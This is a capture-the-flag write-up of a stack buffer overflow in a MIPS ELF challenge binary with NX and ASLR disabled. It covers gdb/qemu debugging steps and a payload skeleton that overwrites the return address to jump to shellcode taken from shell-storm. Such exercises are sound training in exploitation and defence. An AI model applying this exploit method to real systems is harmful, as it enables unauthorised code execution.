[PWN] ELF-MIPS-Stack-buffer-overflow-No-NX

Author: PhieuLang1993
Challenge: Here


We have: NX is disabled, ASLR off

Determining Vulnerabilities:

– By fuzzing, we see that the programs call _ftext method, this method then calls function, and executes sys_exit after.

– Analyzing function:

– This function uses sys_write to print “Hello World\nWhat is your name: “. Then it uses sys_read to read(0, sp, 0x80), then sys_write(1, “Hello”, 7) and sys_write(1, sp, 0x14) (string from our input).

– Furthermore, we see that the program gets the value from sp+0x14 and push into $ra (https://en.wikibooks.org/wiki/MIPS_Assembly/Control_Flow_Instructions). Hence, this program is vulnerable to Stack Overflow so that we can control pc.


– We are going to write shellcode to sp and control sp to jump back and execute shellcode.

– Using gdb-multiarch and qemu-mips-static to debug this program:

  • Terminal 1:
$ qemu-mips-static -g 12345 ./ch65

  • Terminal 2:
$ gdb-multiarch -q
pwndbg: loaded 165 commands. Type pwndbg [filter] for a list
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
pwndbg> set architecture mips
The target architecture is assumed to be mips
pwndbg> set endian big
The target is assumed to be big endian
pwndbg> target remote
Remote debugging using
0x004000f0 in ?? ()


– String “Hello World…” is written.

– Then sys_read(0, sp=0x76fff6a8, 0x80), we have sp address = 0x76fff6a8.

– Terminal 1:


– Terminal 2:

sys_write for “Hello….”

sys_write for entered string

– Take the value from $sp+0x14 and load into $ra, we see that $sp+0x14 = FFFF (0x46464646)

0x46464646 is invalid. Hence, we have stack address = 0x76fff6a8.

– Using shellcode from: http://shell-storm.org/shellcode/files/shellcode-782.php

– We have a payload:

shellcode_addr = 0x76fff6a8 + 0x14 + 4
shellcode = 
payload = “A”*0x14
payload += p32(shellcode_addr)
payload += shellcode

Successfully Exploited:

Full payload:

Local: https://gist.github.com/phieulang1993/db8b01abf3380b87e711f7d53cf2cdde
Remote: https://gist.github.com/phieulang1993/ece9fcb4a58d51d2c5bddb6503cc4556